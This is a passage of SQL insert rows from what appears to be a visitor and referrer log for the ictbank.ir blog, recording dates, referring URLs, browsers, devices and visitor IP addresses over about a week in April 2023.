(31588,'2023-04-16','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.72.155','000',0,1,0),
(31589,'2023-04-16','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','173.252.127.117','000',0,1,0),
(31590,'2023-04-16','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.200.151.2','000',0,1,0),
(31591,'2023-04-16','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','192.227.156.98','000',0,1,0),
(31592,'2023-04-16','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.36.232','000',0,1,0),
(31593,'2023-04-17','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(31594,'2023-04-17','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31595,'2023-04-17','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(31596,'2023-04-17','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','82.165.83.235','000',0,1,0),
(31597,'2023-04-17','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31598,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(31599,'2023-04-17','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(31600,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31601,'2023-04-17','http://www.google.com.hk','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.51.44','000',0,2,0),
(31602,'2023-04-17','https://ictbank.ir/blog','Safari','OS X','5.0.0','desktop','Macintosh','','54.217.83.13','000',0,1,0),
(31603,'2023-04-17','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.40.51.187','000',0,1,0),
(31604,'2023-04-17','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(31605,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.178.154','000',0,1,0),
(31606,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.149.49','000',0,1,0),
(31607,'2023-04-17','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','45.8.135.106','000',0,81,0),
(31608,'2023-04-17','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.135.30','000',0,115,0),
(31609,'2023-04-17','https://ictbank.ir/PG/','Chrome','OS X','112.0.0.0','desktop','Macintosh','','140.99.199.40','000',0,1,0),
(31610,'2023-04-17','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(31611,'2023-04-17','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(31612,'2023-04-17','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.200.79','000',0,9,0),
(31613,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','52.152.167.97','000',0,1,0),
(31614,'2023-04-17','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.86.230','000',0,1,0),
(31615,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','171.244.21.74','000',0,1,0),
(31616,'2023-04-17','https://l.instagram.com/','Instagram','Android','278.0.0.0.0','mobile:smart','Galaxy S20 FE','','54.37.141.33','000',0,2,0),
(31617,'2023-04-17','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','46.100.3.96','000',0,1,0),
(31618,'2023-04-17','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.119.81.104','000',0,2,0),
(31619,'2023-04-17','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','172.104.81.115','000',0,1,0),
(31620,'2023-04-17','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.57.227','000',0,1,0),
(31621,'2023-04-17','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.40.90','000',0,1,0),
(31622,'2023-04-17','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(31623,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,4,0),
(31624,'2023-04-18','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31625,'2023-04-18','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(31626,'2023-04-18','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','49.232.145.205','000',0,1,0),
(31627,'2023-04-18','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(31628,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(31629,'2023-04-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(31630,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.133','000',0,1,0),
(31631,'2023-04-18','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.170','000',0,1,0),
(31632,'2023-04-18','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,2,0),
(31633,'2023-04-18','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(31634,'2023-04-18','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(31635,'2023-04-18','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','140.99.199.47','000',0,6,0),
(31636,'2023-04-18','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,1,0),
(31637,'2023-04-18','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.86.141.254','000',0,1,0),
(31638,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,12,0),
(31639,'2023-04-18','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,1,0),
(31640,'2023-04-18','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','194.163.169.119','000',0,1,0),
(31641,'2023-04-18','https://45.92.94.221:443/blog','Chrome','Linux','86.0.0','desktop','Unknown','','36.156.22.4','000',0,10,0),
(31642,'2023-04-18','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','2.179.50.171','000',0,34,0),
(31643,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.168','000',0,1,0),
(31644,'2023-04-18','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.87.241.26','000',0,1,0),
(31645,'2023-04-18','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31646,'2023-04-18','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(31647,'2023-04-18','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,2,0),
(31648,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','96.0.0','desktop','Unknown','','165.154.36.245','000',0,19,0),
(31649,'2023-04-18','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.50','000',0,2,0),
(31650,'2023-04-18','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.163.12.67','000',0,1,0),
(31651,'2023-04-18','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','23.248.175.154','000',0,9,0),
(31652,'2023-04-18','https://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','34.209.167.181','000',0,1,0),
(31653,'2023-04-18','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=11&func=courses&student_course_id=14&func2=registrations.list','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.182.14','000',0,32,0),
(31654,'2023-04-18','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31655,'2023-04-18','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','173.249.48.75','000',0,10,0),
(31656,'2023-04-18','https://ictbank.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','111.7.100.24','000',0,2,0),
(31657,'2023-04-18','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(31658,'2023-04-18','http://ictbank.ir','Chrome','Windows','83.0.0.0','desktop','Unknown','','77.91.85.147','000',0,1,0),
(31659,'2023-04-18','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,2,0),
(31660,'2023-04-18','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.127.77.103','000',0,1,0),
(31661,'2023-04-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','91.240.118.252','000',0,2,0),
(31662,'2023-04-19','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Nexus 5X','','74.125.210.76','000',0,1,0),
(31663,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.226.250.88','000',0,1,0),
(31664,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','51.91.212.100','000',0,1,0),
(31665,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31666,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31667,'2023-04-19','http://ictbank.ir/blog/wp-login.php','Opera','Windows','12.0','desktop','Unknown','','49.12.33.196','000',0,3,0),
(31668,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','52.45.114.130','000',0,7,0),
(31669,'2023-04-19','https://ictbank.ir/blog','Opera','Linux','89.0.0.0','desktop','Unknown','','37.139.53.7','000',0,3,0),
(31670,'2023-04-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.54.126.2','000',0,1,0),
(31671,'2023-04-19','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,1,0),
(31672,'2023-04-19','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(31673,'2023-04-19','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31674,'2023-04-19','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.197.187.99','000',0,1,0),
(31675,'2023-04-19','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.74','000',0,1,0),
(31676,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','178.63.31.37','000',0,10,0),
(31677,'2023-04-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.188.249','000',0,2,0),
(31678,'2023-04-19','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.0.214','000',0,1,0),
(31679,'2023-04-19','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','87.0.0.0','desktop','Unknown','','185.119.81.104','000',0,2,0),
(31680,'2023-04-19','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','203.124.41.171','000',0,1,0),
(31681,'2023-04-19','https://ictbank.ir/blog','Edge','Windows','100.0.0.0','desktop','Unknown','','92.118.36.208','000',0,1,0),
(31682,'2023-04-19','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.87.97','000',0,1,0),
(31683,'2023-04-19','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.6.178','000',0,1,0),
(31684,'2023-04-19','https://www.google.com/','Firefox','Windows','21.0','desktop','Unknown','','54.205.229.127','000',0,34,0),
(31685,'2023-04-19','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31686,'2023-04-19','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,2,0),
(31687,'2023-04-19','https://45.92.94.221:443/blog','Safari','OS X','14.0','desktop','Macintosh','','106.75.165.117','000',0,4,0),
(31688,'2023-04-19','https://www.google.com/','Chrome','Linux','6.0.0.0','desktop','Unknown','','54.167.97.249','000',0,34,0),
(31689,'2023-04-19','https://design-arena.ir/blog','Edge','Windows','101.0.0.0','desktop','Unknown','','45.76.43.3','000',0,2,0),
(31690,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.190','000',0,1,0),
(31691,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','143.198.189.106','000',0,2,0),
(31692,'2023-04-20','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.147.186.75','000',0,1,0),
(31693,'2023-04-20','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31694,'2023-04-20','https://design-arena.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','2.191.132.205','000',0,5,0),
(31695,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','165.22.96.137','000',0,2,0),
(31696,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31697,'2023-04-20','https://ictbank.ir/blog','Opera','Windows','28.0.0.0','desktop','Unknown','','45.76.43.3','000',0,1,0),
(31698,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(31699,'2023-04-20','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,2,0),
(31700,'2023-04-20','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,2,0),
(31701,'2023-04-20','https://ictbank.ir/blog','Opera','Windows','89.0.0.0','desktop','Unknown','','196.16.223.67','000',0,2,0),
(31702,'2023-04-20','http://ictbank.ir','Opera','Windows','89.0.0.0','desktop','Unknown','','45.252.189.231','000',0,3,0),
(31703,'2023-04-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.49','000',0,2,0),
(31704,'2023-04-20','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.198.181.136','000',0,1,0),
(31705,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(31706,'2023-04-20','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.176.116','000',0,190,0),
(31707,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,3,0),
(31708,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.48.154','000',0,1,0),
(31709,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,1,0),
(31710,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(31711,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(31712,'2023-04-20','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31713,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.246.52.21','000',0,1,0),
(31714,'2023-04-20','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','203.150.228.102','000',0,2,0),
(31715,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(31716,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','178.62.219.65','000',0,1,0),
(31717,'2023-04-20','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,3,0),
(31718,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(31719,'2023-04-20','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(31720,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(31721,'2023-04-20','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(31722,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,2,0),
(31723,'2023-04-20','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(31724,'2023-04-20','https://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,1,0),
(31725,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.10.163.72','000',0,1,0),
(31726,'2023-04-20','https://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','217.198.191.210','000',0,4,0),
(31727,'2023-04-20','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(31728,'2023-04-20','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','86.92.218.40','000',0,1,0),
(31729,'2023-04-20','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(31730,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','75.119.150.252','000',0,48,0),
(31731,'2023-04-20','https://ictbank.ir/blog/wp-admin/post.php?post=647&action=elementor','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.218.185.219','000',0,1,0),
(31732,'2023-04-20','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','46.228.199.158','000',0,2,0),
(31733,'2023-04-20','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(31734,'2023-04-20','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','174.138.68.9','000',0,2,0),
(31735,'2023-04-20','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.224.62','000',0,1,0),
(31736,'2023-04-20','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','103.179.173.237','000',0,4,0),
(31737,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31738,'2023-04-20','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,2,0),
(31739,'2023-04-20','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(31740,'2023-04-20','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.187.248','000',0,1,0),
(31741,'2023-04-20','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,3,0),
(31742,'2023-04-20','http://ictbank.ir/wp-json/wp/v2/posts','Firefox','Windows','42.0','desktop','Unknown','','45.56.175.139','000',0,1,0),
(31743,'2023-04-21','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31744,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,5,0),
(31745,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.145.50.172','000',0,1,0),
(31746,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','182.18.138.74','000',0,1,0),
(31747,'2023-04-21','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(31748,'2023-04-21','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31749,'2023-04-21','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.40','000',0,2,0),
(31750,'2023-04-21','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','134.249.61.142','000',0,2,0),
(31751,'2023-04-21','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','86.55.239.167','000',0,3,0),
(31752,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(31753,'2023-04-21','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(31754,'2023-04-21','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','35.92.94.32','000',0,2,0),
(31755,'2023-04-21','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','197.248.225.89','000',0,1,0),
(31756,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.15.14','000',0,2,0),
(31757,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.193.48','000',0,1,0),
(31758,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,3,0),
(31759,'2023-04-21','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.163','000',0,1,0),
(31760,'2023-04-21','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.156','000',0,1,0),
(31761,'2023-04-21','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.155','000',0,1,0),
(31762,'2023-04-21','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.152','000',0,1,0),
(31763,'2023-04-21','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,6,0),
(31764,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.26.169.185','000',0,1,0),
(31765,'2023-04-21','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31766,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.171.181.149','000',0,1,0),
(31767,'2023-04-21','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','142.93.48.245','000',0,1,0),
(31768,'2023-04-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.178.221.98','000',0,1,0),
(31769,'2023-04-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.92.1.148','000',0,21,0),
(31770,'2023-04-21','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.109.44.217','000',0,1,0),
(31771,'2023-04-21','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(31772,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','116.62.155.4','000',0,1,0),
(31773,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','189.126.206.157','000',0,1,0),
(31774,'2023-04-21','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(31775,'2023-04-21','http://design-arena.ir','Chrome','Windows','78.0.0.0','desktop','Unknown','','91.203.5.115','000',0,1,0),
(31776,'2023-04-21','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(31777,'2023-04-21','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(31778,'2023-04-21','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,2,0),
(31779,'2023-04-22','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','122.17.152.240','000',0,1,0),
(31780,'2023-04-22','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,2,0),
(31781,'2023-04-22','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(31782,'2023-04-22','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31783,'2023-04-22','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(31784,'2023-04-22','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,7,0),
(31785,'2023-04-22','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.36','000',0,2,0),
(31786,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.136.16','000',0,1,0),
(31787,'2023-04-22','https://ictbank.ir/blog','Chrome','Linux','111.0.0.0','desktop','Unknown','','149.202.80.155','000',0,3,0),
(31788,'2023-04-22','https://ictbank.ir/blog','Chrome','Linux','111.0.0.0','desktop','Unknown','','149.202.80.191','000',0,2,0),
(31789,'2023-04-22','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(31790,'2023-04-22','https://ictbank.ir/blog','Firefox','OS X','95.0','desktop','Macintosh','','131.153.240.178','000',0,4,0),
(31791,'2023-04-22','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31792,'2023-04-22','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.137','000',0,1,0),
(31793,'2023-04-22','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.161','000',0,1,0),
(31794,'2023-04-22','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.142','000',0,1,0),
(31795,'2023-04-22','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.169','000',0,1,0),
(31796,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','209.203.48.58','000',0,1,0),
(31797,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','52.147.207.96','000',0,1,0),
(31798,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.210.144.171','000',0,1,0),
(31799,'2023-04-22','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.196.122','000',0,1,0),
(31800,'2023-04-22','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.152.92','000',0,1,0),
(31801,'2023-04-22','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31802,'2023-04-22','https://ictbank.ir/blog','Chrome','Android','111.0.0.0','mobile:smart','Galaxy A11','','164.92.223.171','000',0,3,0),
(31803,'2023-04-22','https://ictbank.ir/blog','Edge','Android','111.0.0.0','mobile:smart','Galaxy A11','','5.127.175.24','000',0,2,0),
(31804,'2023-04-22','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(31805,'2023-04-22','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
